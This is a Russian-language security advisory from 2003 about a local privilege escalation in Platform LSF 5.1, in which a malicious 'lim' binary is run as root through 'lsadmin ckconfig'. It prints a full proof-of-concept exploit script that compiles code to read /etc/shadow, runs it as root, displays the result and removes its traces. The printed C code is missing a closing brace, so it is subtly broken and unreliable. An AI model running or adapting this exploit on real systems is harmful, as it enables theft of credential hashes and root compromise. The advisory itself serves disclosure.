Platform LSF позволяет локальному пользователю выполнять произвольный код с root привилегиями

Дата публикации:
27.05.2003
Всего просмотров:
947
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в Platform Computing's Platform LSF. Локальный пользователь может получить root привилегии на системе.

Сообщается, что локальный пользователь может установить переменную LSF_ENVDIR, чтобы заставить 'lsadmin' использовать альтернативный 'lsf.conf' файл. Локальный пользователь может также установить LSF_SERVERDIR переменную в 'lsf.conf' файле к альтернативному местоположению, в котором содержится злонамеренная 'lim' программа. Затем, запуская 'lsadmin' ckconfig команду, может выполнить злонамеренный 'lim' код с root привилегиями. Эксплоит:

# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ

# Proof of concept - for educational purposes only!

cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
 
__END__

gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file

Уязвимость обнаружена в Platform LSF 5.1

Ссылки: Security advisory: LSF 5.1 local root exploit
или введите имя

CAPTCHA